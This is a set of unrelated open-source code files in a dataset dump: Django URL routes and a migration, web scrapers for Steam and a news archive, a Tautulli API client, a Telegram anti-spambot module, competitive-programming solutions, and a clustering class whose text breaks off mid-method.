+{"seq_id":"365563907","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n    path('registration/', views.registration_page, name='registration_page'),\n    path('login/', views.login_page, name='login_page'),\n    path('logout/', views.logout_user, name='logout'),\n\n    path('', views.home, name='home'),\n    path('products/', views.products, name='products'),\n    path('info/', views.info, name='info'),\n    path('customer/', views.customer, name='customers'),\n\n    # create/update related urls\n    path('create_customer/', views.create_customer, name='create_customer'),\n    path('create_product/', views.create_product, name='create_product'),\n    path('create_order/<str:pk>/', views.create_order_customer, name='create_order'),\n    path('update_order/<str:pk>/', views.update_order_customer, name='update_order'),\n    path('delete_order/<str:pk>/', views.delete_order_customer, name='delete_order'),\n]\n","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"511712520","text":"# https://atcoder.jp/contests/abc070/tasks/abc070_b\nimport sys\nsys.setrecursionlimit(2147483647)\nINF=float(\"inf\")\nMOD=10**9+7\ninput=lambda :sys.stdin.readline().rstrip()\ndef resolve():\n    a,b,c,d=map(int,input().split())\n    print(max(0,min(d,b)-max(a,c)))\nresolve()\n","sub_path":"ABC070/b_two_switches.py","file_name":"b_two_switches.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"183755839","text":"from bs4 import BeautifulSoup as soup\nfrom urllib.request import urlopen as uReq\nfrom mongoengine import *\nfrom datetime import datetime\nfrom config import config\n\nbaseUrl = \"https://store.steampowered.com/search/?specials=1&page=\"\n\n# Connect to MongoDB\ndb = connect('steam-scrape', host='mongodb://ds145039.mlab.com', port=45039, username=config['username'], password=config['password'])\n\n\n# ===========================\n# Schema Class Definitions\n# ===========================\nclass Games(Document):\n    gameName = StringField(required=True)\n    platform = ListField(StringField())\n    originalPrice = IntField(required=True)\n    discountedPrice = ListField(DictField(), required=True)\n\n\n# ===========================\n# Secondary Functions\n# ===========================\ndef parsePlatforms(product):\n    platforms = []\n    platforms_raw = product.findAll(\"span\", \"platform_img\")\n    for span in platforms_raw:\n        if \"win\" in str(span):\n            platforms.append(\"win\")\n        if \"mac\" in str(span):\n            platforms.append(\"mac\")\n        if \"linux\" in str(span):\n            platforms.append(\"linux\")\n    return platforms\n\n\n# ===========================\n# Main Function\n# ===========================\ndef main():\n    # Create connection, read raw html, close connection\n    uClient = uReq(baseUrl + \"1\")\n    page_html = uClient.read()\n    uClient.close()\n\n    # Parse the html\n    page_soup = soup(page_html, \"html.parser\")\n\n    # Grabs list of products\n    search_results = page_soup.findAll(\"a\", {\"class\": \"search_result_row\"})\n\n    for i, product in enumerate(search_results):\n        try:\n            name = product.find(\"span\", \"title\").text.strip()\n            original_price = int(str(product.find(\"strike\")).replace(\"<strike>\", \"\").replace(\"</strike>\", \"\").replace(\"$\", \"\").replace(\".\", \"\"))\n            sale_price = int(str(product.find(\"div\", \"search_price\").contents[3]).replace(\"$\", \"\").replace(\".\", \"\").strip())\n            platforms = parsePlatforms(product)\n\n            game_data = 
{\n \"gameName\": name,\n \"platform\": platforms,\n \"originalPrice\": original_price,\n \"discountedPrice\": [{\n \"date\": datetime.now(),\n \"price\": sale_price\n }],\n }\n\n if Games.objects(gameName=game_data['gameName']): # If there's already a db entry for the game title...\n # Push new price data\n updatedObject = (\n Games.objects(gameName=game_data['gameName'])\n .modify(push__discountedPrice=game_data[\"discountedPrice\"][0])\n )\n print(\"Updated\")\n else:\n # Create Games document and write to DB\n game = Games(gameName=game_data['gameName'])\n game.platform = game_data['platform']\n game.originalPrice = game_data['originalPrice']\n game.discountedPrice = game_data['discountedPrice']\n game.save()\n print(\"New game added to db\")\n\n except Exception as e:\n print(\"**********Problem with iteration \" + str(i) + \"**********\")\n print(e)\n\n # Close DB connection\n db.close()\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"272464163","text":"from bs4 import BeautifulSoup\nimport requests\nfrom random import randint\n\ndef get_month(mo):\n op = ''\n if(mo == 'january'):\n op = '01'\n elif(mo == 'february'):\n op = '02'\n elif(mo == 'march'):\n op = '03'\n elif(mo == 'april'):\n op = '04'\n elif(mo == 'may'):\n op = '05'\n elif(mo == 'june'):\n op = '06'\n elif(mo == 'july'):\n op = '07'\n elif(mo == 'august'):\n op = '08'\n elif(mo == 'september'):\n op = '09'\n elif(mo == 'october'):\n op = '10'\n elif(mo == 'november'):\n op = '11'\n else:\n op = '12'\n return op\n\ndecade = ['2001-2010','liberation/2011-2020','liberation/2020/12/2021-2030']\n\nfor dec in decade:\n print('hi1')\n raw_years = requests.get(\"https://www.cpiml.net/\"+dec)\n print('hi2')\n soup_year = BeautifulSoup(raw_years.text,'lxml')\n yrs = soup_year.find_all('nav',{'role' : 'navigation', 'aria-labelledby':\"book-label-3\"})\n \n yrl = [yr['href'] for yr in yrs[0].find_all('a',href = True)]\n \n\n for yr in yrl:\n curr_yr = yr[len(yr)-4:]\n month_page = requests.get(\"https://www.cpiml.net/\"+yr)\n soup_month = BeautifulSoup(month_page.text,'lxml')\n month = soup_month.find_all('nav',{'role':'navigation','aria-labelledby':\"book-label-3\" })\n monthl = [mon['href'] for mon in month[0].find_all('a',href = True)]\n\n print('hi3')\n for mon in monthl:\n\n article_link_page = requests.get(\"https://www.cpiml.net/\"+mon)\n \n soup_article_link = BeautifulSoup(article_link_page.text,'lxml')\n\n curr_mon = soup_article_link.find('h1',class_ = 'page-header').text\n curr_mon = curr_mon.replace(curr_yr,'')\n curr_mon = curr_mon.replace('-','')\n curr_mon = curr_mon.replace('\\n','')\n articles = soup_article_link.find_all('nav',{'role':'navigation','aria-labelledby':\"book-label-3\" })\n \n articlel = [atc['href'] for atc in articles[0].find_all('a',href = True)]\n \n\n for article in articlel:\n art = requests.get(\"https://www.cpiml.net/\"+article)\n soup_article = BeautifulSoup(art.text,'lxml')\n\n fs = soup_article.find('h1',class_ = 'page-header').text\n fs+= soup_article.find('div',class_ = \"field field--name-body field--type-text-with-summary field--label-hidden field--item\").text\n monstr = get_month(curr_mon.lower())\n id = 't'+curr_yr+monstr+'01'+str(randint(100000,999999))\n f = open('new_data/'+id+'.txt','w')\n f.write(fs.encode('utf-8'))\n 
f.close()","sub_path":"workflow/extractionliberation1.py","file_name":"extractionliberation1.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"401206544","text":"from django.conf.urls import url\nfrom . import views\nfrom django.conf import settings\n# from django.conf.urls.static import static\n\nurlpatterns = [\nurl('^$', views.index, name = 'index'),\nurl('^location', views.location, name = 'location'),\nurl(r'^search/', views.search_results, name='search_results'),\nurl(r'^photo/(\\d+)',views.photo,name ='photo'), \nurl(r'^mode$',views.modal,name ='modal')\n\n]\n\n# if settings.DEBUG:\n# urlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)","sub_path":"gallery/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"346235237","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n \"\"\"\n Creación de modelo Bedelia.\n \"\"\"\n\n dependencies = [\n ('app_reservas', '0011_redefinicion_archivo_ubicacion'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Bedelia',\n fields=[\n ('id', models.AutoField(auto_created=True,\n verbose_name='ID',\n primary_key=True,\n serialize=False)),\n ],\n options={\n 'verbose_name': 'Bedelía',\n 'verbose_name_plural': 'Bedelías',\n },\n ),\n migrations.AddField(\n model_name='bedelia',\n name='area',\n field=models.ForeignKey(to='app_reservas.Area'),\n ),\n migrations.AddField(\n model_name='bedelia',\n name='aulas',\n field=models.ManyToManyField(to='app_reservas.Aula'),\n ),\n migrations.AddField(\n model_name='bedelia',\n name='laboratorios_informatica',\n field=models.ManyToManyField(to='app_reservas.LaboratorioInformatico'),\n ),\n ]\n","sub_path":"app_reservas/migrations/0012_clase_bedelia.py","file_name":"0012_clase_bedelia.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"246815232","text":"\"\"\"\nA python module to get information from Tautulli.\n\nThis code is released under the terms of the MIT license. 
See the LICENSE\nfile for more details.\n\"\"\"\nimport requests\nimport urllib3\nurllib3.disable_warnings()\n\n\ndef get_users(host, port, api_key, schema='http'):\n    \"\"\"Get all users.\"\"\"\n    cmd = 'get_users'\n    url = \"{}://{}:{}/api/v2?apikey={}&cmd={}\".format(schema, host, port,\n                                                      api_key, cmd)\n    users = []\n    try:\n        result = requests.get(url, timeout=8, verify=False).json()\n        result = result['response']['data']\n        for user_data in result:\n            users.append(user_data['username'])\n    except requests.exceptions.HTTPError:\n        users.append('None')\n    return users\n\n\ndef verify_user(host, port, api_key, username, schema='http'):\n    \"\"\"Verify that a user exists.\"\"\"\n    cmd = 'get_users'\n    url = \"{}://{}:{}/api/v2?apikey={}&cmd={}\".format(schema, host, port,\n                                                      api_key, cmd)\n    try:\n        result = requests.get(url, timeout=8, verify=False).json()\n        result = result['response']['data']\n        for user_data in result:\n            if user_data['username'].lower() == username.lower():\n                user = True\n                break\n            else:\n                user = False\n    except requests.exceptions.HTTPError:\n        user = False\n    return user\n\n\ndef get_user_state(host, port, api_key, username, schema='http'):\n    \"\"\"Get the state of a user.\"\"\"\n    verify_user(host, port, api_key, username, schema)\n    cmd = 'get_activity'\n    url = \"{}://{}:{}/api/v2?apikey={}&cmd={}\".format(schema, host, port,\n                                                      api_key, cmd)\n    user_state = 'not available'\n    try:\n        result = requests.get(url, timeout=8, verify=False).json()\n        result = result['response']['data']['sessions']\n        for sessions in result:\n            if sessions['username'].lower() == username.lower():\n                user_state = sessions['state']\n                break\n    except requests.exceptions.HTTPError:\n        user_state = 'not available'\n    return user_state\n\n\ndef get_user_activity(host, port, api_key, username, schema='http'):\n    \"\"\"Get the last activity for the specified user.\"\"\"\n    verify_user(host, port, api_key, username, schema)\n    cmd = 'get_activity'\n    url = \"{}://{}:{}/api/v2?apikey={}&cmd={}\".format(schema, host, port,\n                                                      api_key, cmd)\n    user_activity = default_activity_attributes()\n    try:\n        result = requests.get(url, timeout=8, verify=False).json()\n        result = result['response']['data']['sessions']\n        for sessions in result:\n            if sessions['username'].lower() == username.lower():\n                for key in sessions:\n                    user_activity[key] = sessions[key]\n                user_activity = custom_activity(user_activity)\n                break\n    except requests.exceptions.HTTPError:\n        user_activity = 'not available'\n    return user_activity\n\n\ndef get_most_stats(host, port, api_key, schema='http'):\n    \"\"\"Get the most * statistics.\"\"\"\n    cmd = 'get_home_stats'\n    url = \"{}://{}:{}/api/v2?apikey={}&cmd={}\".format(schema, host, port,\n                                                      api_key, cmd)\n    home_stats = {}\n    result = None\n    try:\n        request = requests.get(url, timeout=8, verify=False).json()\n        result = request['response']['data']\n    except KeyError:\n        home_stats.update(Status=\"not available\")\n    if result:\n        try:\n            if result[0]['rows'][0]['title']:\n                home_stats.update(Movie=result[0]['rows'][0]['title'])\n        except IndexError:\n            home_stats.update(Movie=\"None\")\n        try:\n            if result[3]['rows'][0]['title']:\n                home_stats.update(TV=result[3]['rows'][0]['title'])\n        except IndexError:\n            home_stats.update(TV=\"None\")\n        try:\n            if result[7]['rows'][0]['user']:\n                home_stats.update(User=result[7]['rows'][0]['user'])\n        except IndexError:\n            home_stats.update(User=\"None\")\n    return home_stats\n\n\ndef get_server_stats(host, port, api_key, schema='http'):\n    \"\"\"Get server statistics.\"\"\"\n    cmd = 'get_activity'\n    url = 
\"{}://{}:{}/api/v2?apikey={}&cmd={}\".format(schema, host, port,\n api_key, cmd)\n server_stats = {}\n try:\n request = requests.get(url, timeout=8, verify=False).json()\n result = request['response']['data']\n server_stats['count'] = result['stream_count']\n server_stats['total_bandwidth'] = result['total_bandwidth']\n server_stats['count_transcode'] = result['stream_count_transcode']\n server_stats['wan_bandwidth'] = result['wan_bandwidth']\n server_stats['direct_plays'] = result['stream_count_direct_play']\n server_stats['lan_bandwidth'] = result['lan_bandwidth']\n server_stats['direct_streams'] = result['stream_count_direct_stream']\n except requests.exceptions.HTTPError:\n server_stats = {}\n except requests.exceptions.SSLError:\n server_stats = {}\n return server_stats\n\n\ndef custom_activity(alist):\n \"\"\"Create additional activitie keys.\"\"\"\n if alist['media_type'] == 'episode':\n senum = ('S{0}'.format(alist['parent_media_index'].zfill(2)) +\n 'E{0}'.format(alist['media_index'].zfill(2)))\n alist['senum'] = senum\n alist['show_senum'] = alist['grandparent_title'] + ' ' + senum\n alist['s_senum_e'] = (alist['grandparent_title'] +\n ' ' + senum + ' ' + alist['title'])\n alist['magic_title'] = alist['s_senum_e']\n elif alist['media_type'] == 'movie':\n alist['magic_title'] = alist['full_title']\n return alist\n\n\ndef default_activity_attributes():\n \"\"\"Return default values for the activity_list.\"\"\"\n output = {}\n alist = ['_cache_time', 'actors', 'added_at', 'allow_guest', 'art',\n 'aspect_ratio', 'audience_rating', 'audio_bitrate',\n 'audio_bitrate_mode', 'audio_channel_layout', 'audio_channels',\n 'audio_codec', 'audio_decision', 'audio_language',\n 'audio_language_code', 'audio_profile', 'audio_sample_rate',\n 'bandwidth', 'banner', 'bif_thumb', 'bitrate', 'channel_stream',\n 'children_count', 'collections', 'container', 'content_rating',\n 'deleted_user', 'device', 'directors', 'do_notify', 'duration',\n 'email', 'file', 'file_size', 'full_title', 'genres',\n 'grandparent_rating_key', 'grandparent_thumb',\n 'grandparent_title', 'guid', 'height', 'id', 'indexes',\n 'ip_address', 'ip_address_public', 'is_admin', 'is_allow_sync',\n 'is_home_user', 'is_restricted', 'keep_history', 'labels',\n 'last_viewed_at', 'library_name', 'live', 'live_uuid', 'local',\n 'location', 'machine_id', 'media_index', 'media_type',\n 'optimized_version', 'optimized_version_profile',\n 'optimized_version_title', 'original_title',\n 'originally_available_at', 'parent_media_index',\n 'parent_rating_key', 'parent_thumb', 'parent_title', 'platform',\n 'platform_name', 'platform_version', 'player', 'product',\n 'product_version', 'profile', 'progress_percent',\n 'quality_profile', 'rating', 'rating_key', 'relay', 's_senum_e',\n 'section_id', 'senum', 'session_id', 'session_key',\n 'shared_libraries', 'show_senum', 'sort_title', 'state',\n 'stream_aspect_ratio', 'stream_audio_bitrate',\n 'stream_audio_bitrate_mode', 'stream_audio_channel_layout',\n 'stream_audio_channel_layout_', 'stream_audio_channels',\n 'stream_audio_codec', 'stream_audio_decision',\n 'stream_audio_language', 'stream_audio_language_code',\n 'stream_audio_sample_rate', 'stream_bitrate', 'stream_container',\n 'stream_container_decision', 'stream_duration',\n 'stream_subtitle_codec', 'stream_subtitle_container',\n 'stream_subtitle_decision', 'stream_subtitle_forced',\n 'stream_subtitle_format', 'stream_subtitle_language',\n 'stream_subtitle_language_code', 'stream_subtitle_location',\n 'stream_video_bit_depth', 
'stream_video_bitrate',\n 'stream_video_codec', 'stream_video_codec_level',\n 'stream_video_decision', 'stream_video_framerate',\n 'stream_video_height', 'stream_video_language',\n 'stream_video_language_code', 'stream_video_ref_frames',\n 'stream_video_resolution', 'stream_video_width', 'studio',\n 'subtitle_codec', 'subtitle_container', 'subtitle_decision',\n 'subtitle_forced', 'subtitle_format', 'subtitle_language',\n 'subtitle_language_code', 'subtitle_location', 'subtitles',\n 'summary', 'synced_version', 'synced_version_profile', 'tagline',\n 'throttled', 'thumb', 'title', 'transcode_audio_channels',\n 'transcode_audio_codec', 'transcode_container',\n 'transcode_decision', 'transcode_height', 'transcode_hw_decode',\n 'transcode_hw_decode_title', 'transcode_hw_decoding',\n 'transcode_hw_encode', 'transcode_hw_encode_title',\n 'transcode_hw_encoding', 'transcode_hw_full_pipeline',\n 'transcode_hw_requested', 'transcode_key', 'transcode_progress',\n 'transcode_protocol', 'transcode_speed', 'transcode_throttled',\n 'transcode_video_codec', 'transcode_width', 'type', 'updated_at',\n 'user', 'user_id', 'user_rating', 'user_thumb', 'username',\n 'video_bit_depth', 'video_bitrate', 'video_codec',\n 'video_codec_level', 'video_decision', 'video_frame_rate',\n 'video_framerate', 'video_height', 'video_language',\n 'video_language_code', 'video_profile', 'video_ref_frames',\n 'video_resolution', 'video_width', 'view_offset', 'width',\n 'writers', 'year']\n for key in alist:\n output[key] = \"\"\n return output\n","sub_path":"pytautulli/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"262186885","text":"\n\n\"\"\"\n# Search Insert Position\n\nTotal Accepted: 73443 Total Submissions: 206644 Difficulty: Medium\n\n\nGiven a sorted array and a target value, return the index if the target is found. 
If not, return the index where it would be if it were inserted in order.\n\nYou may assume no duplicates in the array.\n\nHere are few examples.\n`[1,3,5,6]`, 5 → 2\n`[1,3,5,6]`, 2 → 1\n`[1,3,5,6]`, 7 → 4\n`[1,3,5,6]`, 0 → 0\n\nShow Tags\n\n[Array](/tag/array/) [Binary Search](/tag/binary-search/)\n\nShow Similar Problems\n\n[ (E) First Bad Version](/problems/first-bad-version/)\n\n\n\"\"\"\n\n\n\n\n\nfrom pyshould import should\nfrom pylon import puts\n\n\nclass Solution(object):\n\n    def searchInsert(self, nums, target):\n        \"\"\"\n        :type nums: List[int]\n        :type target: int\n        :rtype: int\n        \"\"\"\n        if len(nums) == 0:\n            return 0\n        else:\n            left, right = 0, len(nums)-1\n            while left <= right:\n                mid = (left + right) // 2\n                if nums[mid] == target:\n                    return mid\n                elif nums[mid] > target:\n                    right = mid - 1\n                else:\n                    left = mid + 1\n            return left\n\n\n\n\n\ndef test_search_insert():\n    searchInsert = Solution().searchInsert\n    searchInsert([], 5) | should.eq(0)\n    searchInsert([5], 5) | should.eq(0)\n    searchInsert([1, 2, 3], 2) | should.eq(1)\n    searchInsert([1, 3, 5, 6], 5) | should.eq(2)\n    searchInsert([1, 3, 5, 6], 2) | should.eq(1)\n    searchInsert([1, 3, 5, 6], 7) | should.eq(4)\n    searchInsert([1, 3, 5, 6], 0) | should.eq(0)\n\n\ntest_search_insert()\n\n\n\n","sub_path":"leetcode_solved/035_search_insert_position___medium.py","file_name":"035_search_insert_position___medium.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"633814578","text":"from django.conf.urls.defaults import url, patterns\nfrom cyder.cydhcp.vlan.views import VlanCreateView, vlan_detail\nfrom cyder.cydhcp.urls import cydhcp_urls\n\n\nurlpatterns = patterns(\n    '',\n    url(r'^create/$', VlanCreateView.as_view(),\n        name='vlan-create'),\n    url(r'^(?P<pk>[\w-]+)/$', vlan_detail,\n        name='vlan-detail'),\n) + cydhcp_urls('vlan')\n","sub_path":"cyder/cydhcp/vlan/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"178655363","text":"import telethon as tg\n\nimport command\nimport module\n\n\nclass AntibotModule(module.Module):\n    name = \"Antibot\"\n\n    suspicious_keywords = [\"investment\", \"profit\", \"binance\", \"binanse\", \"bitcoin\", \"testnet\", \"bitmex\"]\n\n    suspicious_entities = [\n        tg.types.MessageEntityUrl,\n        tg.types.MessageEntityTextUrl,\n        tg.types.MessageEntityEmail,\n        tg.types.MessageEntityPhone,\n    ]\n\n    async def on_load(self):\n        # Populate config if necessary\n        if \"antibot\" not in self.bot.config:\n            self.bot.config[\"antibot\"] = {\"threshold_time\": 30, \"group_ids\": []}\n        else:\n            if \"threshold_time\" not in self.bot.config[\"antibot\"]:\n                self.bot.config[\"antibot\"][\"threshold_time\"] = 30 # seconds\n            if \"group_ids\" not in self.bot.config[\"antibot\"]:\n                self.bot.config[\"antibot\"][\"group_ids\"] = []\n\n    def msg_has_suspicious_entity(self, msg):\n        if not msg.entities:\n            return False\n\n        # Messages containing certain entities are more likely to be spam\n        for entity in msg.entities:\n            if entity.__class__ in self.__class__.suspicious_entities:\n                return True\n\n        return False\n\n    def msg_has_suspicious_keyword(self, msg):\n        if not msg.raw_text:\n            return False\n\n        # Many spam messages mention certain keywords, such as cryptocurrency exchanges\n        l_text = msg.raw_text.lower()\n        for kw in self.__class__.suspicious_keywords:\n            if kw in l_text:\n                return True\n\n        return False\n\n    def 
msg_content_suspicious(self, msg):\n        # Consolidate message content checks\n        return self.msg_has_suspicious_entity(msg) or self.msg_has_suspicious_keyword(msg)\n\n    def msg_data_is_suspicious(self, msg):\n        incoming = not msg.out\n        has_date = msg.date\n        forwarded = msg.forward\n\n        # Message *could* be suspicious if we didn't send it\n        # Check for a date to exonerate empty messages\n        if incoming and has_date:\n            # Lazily evaluate suspicious content as it is more expensive\n            return forwarded or self.msg_content_suspicious(msg)\n\n        return False\n\n    async def msg_is_suspicious(self, msg):\n        # Check if the data in the message is suspicious\n        if not self.msg_data_is_suspicious(msg):\n            return False\n\n        # Load group-specific user information\n        chat = await msg.get_chat()\n        sender = await msg.get_sender()\n        ch_participant = await self.bot.client(tg.tl.functions.channels.GetParticipantRequest(chat, sender))\n        participant = ch_participant.participant\n\n        # Exempt the group creator\n        if isinstance(participant, tg.tl.types.ChannelParticipantCreator):\n            return False\n\n        delta = msg.date - participant.date\n        if delta.total_seconds() <= self.bot.config[\"antibot\"][\"threshold_time\"]:\n            # Suspicious message was sent shortly after joining\n            return True\n\n        # Allow this message\n        return False\n\n    async def take_action(self, msg):\n        # Ban the sender\n        chat = await msg.get_chat()\n        sender = await msg.get_sender()\n        rights = tg.tl.types.ChatBannedRights(until_date=None, view_messages=True)\n        ban_request = tg.tl.functions.channels.EditBannedRequest(chat, sender, rights)\n        await self.bot.client(ban_request)\n\n        # Log the event\n        self.log.info(f'Banned spambot with ID {sender.id} in group \"{chat.title}\"')\n        await msg.reply(f\"❯❯ **Banned spambot** with ID `{sender.id}`\")\n        self.bot.dispatch_event_nowait(\"stat_event\", \"spambots_banned\")\n\n        # Delete the spam message\n        await msg.delete()\n\n    async def on_message(self, msg):\n        enabled_in_chat = msg.is_group and msg.chat_id in self.bot.config[\"antibot\"][\"group_ids\"]\n\n        if enabled_in_chat and await self.msg_is_suspicious(msg):\n            # This is most likely a spambot, take action against the user\n            await self.take_action(msg)\n\n    @command.desc(\"Toggle the antibot auto-moderation feature in this group\")\n    async def cmd_antibot(self, msg):\n        if not msg.is_group:\n            return \"__Antibot can only be used in groups.__\"\n\n        gid_table = self.bot.config[\"antibot\"][\"group_ids\"]\n        state = msg.chat_id in gid_table\n        state = not state\n\n        if state:\n            gid_table.append(msg.chat_id)\n        else:\n            gid_table.remove(msg.chat_id)\n\n        await self.bot.save_config()\n\n        status = \"enabled\" if state else \"disabled\"\n        return f\"Antibot is now **{status}** in this group.\"\n","sub_path":"modules/antibot.py","file_name":"antibot.py","file_ext":"py","file_size_in_byte":4652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"432729518","text":"\"\"\"The Genie+ Clustering Algorithm\n\nCopyright (C) 2018-2019 Marek.Gagolewski.com\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. 
Neither the name of the copyright holder nor the names of its contributors\nmay be used to endorse or promote products derived from this software without\nspecific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\nTHE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nimport numpy as np\nfrom . import internal\nfrom . import mst\nimport scipy.spatial.distance\nfrom sklearn.base import BaseEstimator, ClusterMixin\nimport sklearn.neighbors\nimport warnings\nimport math\n\n# @TODO: delme\nimport time\n\n#\ntry:\n import faiss\nexcept ImportError:\n pass\n\n\n\nclass Genie(BaseEstimator, ClusterMixin):\n \"\"\"The Genie+ Clustering Algorithm with optional smoothing and\n noise point detection (for M>1)\n\n Based on: Gagolewski M., Bartoszuk M., Cena A.,\n Genie: A new, fast, and outlier-resistant hierarchical clustering algorithm,\n Information Sciences 363, 2016, pp. 8-23. doi:10.1016/j.ins.2016.05.003\n\n A new hierarchical clustering linkage criterion: the Genie algorithm\n links two clusters in such a way that an inequity measure\n (namely, the Gini index) of the cluster sizes doesn't go far beyond\n some threshold. The introduced method most often outperforms\n the Ward or average linkage, k-means, spectral clustering,\n DBSCAN, Birch, and many others in terms of the clustering\n quality while - at the same time - it retains the speed of\n the single linkage algorithm.\n\n This is a new implementation of the Genie algorithm that requires\n O(n_samples*sqrt(n_samples))-time given a minimum spanning tree\n of the pairwise distance graph.\n The clustering can also be computed with respect to the\n mutual reachability distance (based, e.g., on the Euclidean metric),\n which is used in the definition of the HDBSCAN* algorithm, see\n R. Campello, D. Moulavi, A. Zimek, J. Sander, Hierarchical density\n estimates for data clustering, visualization, and outlier detection,\n ACM Transactions on Knowledge Discovery from Data 10(1):5:1–5:51, 2015.\n doi:10.1145/2733381.\n\n The Genie correction together with the smoothing factor M>2 (note that\n M==2 corresponds to the original distance) gives a robustified version of\n the HDBSCAN algorithm that is able to yield a predefined number of clusters,\n and hence not dependent on the original DBSCAN's somehow magical\n `eps` parameter or the HDBSCAN Python package's `min_cluster_size` one.\n\n\n Parameters\n ----------\n\n n_clusters : int, default=2\n Number of clusters to detect.\n gini_threshold : float in [0,1], default=0.3\n The threshold for the Genie correction, i.e.,\n the Gini index of the cluster size distribution.\n Threshold of 1.0 disables the correction.\n Low thresholds highly penalize the formation of small clusters.\n M : int, default=1\n Smoothing factor. 
M=1 gives the original Genie algorithm.\n n_neighbors : int, default=-1\n Number of nearest neighbors to compute for each data point.\n n_neighbors < 0 picks the default one, typically several dozen,\n but no less than M. Note that the algorithm's memory\n consumption is proportional to n_samples*n_neighbors.\n postprocess : str, one of \"boundary\" [default], \"none\", \"all\"\n Effective only if M>1. By default, only \"boundary\" points are merged\n with their nearest \"core\" points. To force a classical\n n_clusters-partition of a data set (with no notion of noise),\n choose \"all\".\n exact : bool, default=False\n If False, the minimum spanning tree shall be approximated\n based on the nearest neighbors graph. Finding nearest neighbors\n in low dimensional spaces is usually fast. Otherwise,\n the algorithm will need to inspect all pairwise distances,\n which gives the time complexity of O(n_samples*n_samples*n_features).\n allow_cast_float32 : bool, default=True\n Allow casting input data to float32 (for efficiency reasons, however,\n increases total memory usage). Note that some nearest neighbor search\n methods require float32 data anyway. This also normalizes\n the input coordinates so that the method is guaranteed to be translation\n and scale invariant.\n nn_params: dict, optional (default=None)\n Arguments to the sklearn.neighbors.NearestNeighbors class\n constructor, e.g., the metric to use (default='euclidean').\n\n\n Attributes\n ----------\n\n labels_ : ndarray, shape (n_samples,)\n Detected cluster labels for each point in the dataset given to fit():\n an integer vector c with c[i] denoting the cluster id\n (in {0, ..., n_clusters-1}) of the i-th object.\n If M>1, noise points are labeled -1.\n \"\"\"\n\n def __init__(self,\n n_clusters=2,\n gini_threshold=0.3,\n M=1,\n n_neighbors=-1,\n postprocess=\"boundary\",\n exact=True,\n allow_cast_float32=True,\n nn_params=None\n ):\n self.n_clusters = n_clusters\n self.gini_threshold = gini_threshold\n self.M = M\n self.n_neighbors = n_neighbors\n self.postprocess = postprocess\n self.exact = exact\n self.allow_cast_float32 = allow_cast_float32\n self.nn_params = nn_params\n\n self.labels_ = None\n # self.__last_state = dict()\n # self.__last_X\n # self.__last_mst\n # self.__last_nn_dist\n # self.__last_nn_ind\n\n\n def fit(self, X, y=None, cache=False):\n \"\"\"Perform clustering on X.\n The resulting partition shall be given by self.labels_.\n\n\n Parameters\n ----------\n\n X : ndarray, shape (n_samples, n_features)\n A matrix defining n_samples points in\n a n_features-dimensional vector space.\n y : None\n Ignored.\n cache : bool, default=True\n Store auxiliary results to speed up further calls\n to fit() on the same data matrix, but with different params.\n\n\n Returns\n -------\n\n self\n \"\"\"\n n = X.shape[0]\n #d = X.shape[0]\n\n if cache:\n raise NotImplementedError(\"cache not implemented yet\")\n\n\n cur_state = dict()\n\n if self.nn_params is None:\n cur_state[\"nn_params\"] = dict()\n else:\n cur_state[\"nn_params\"] = self.nn_params\n\n cur_state[\"metric\"] = cur_state[\"nn_params\"].get(\"metric\", \"euclidean\")\n 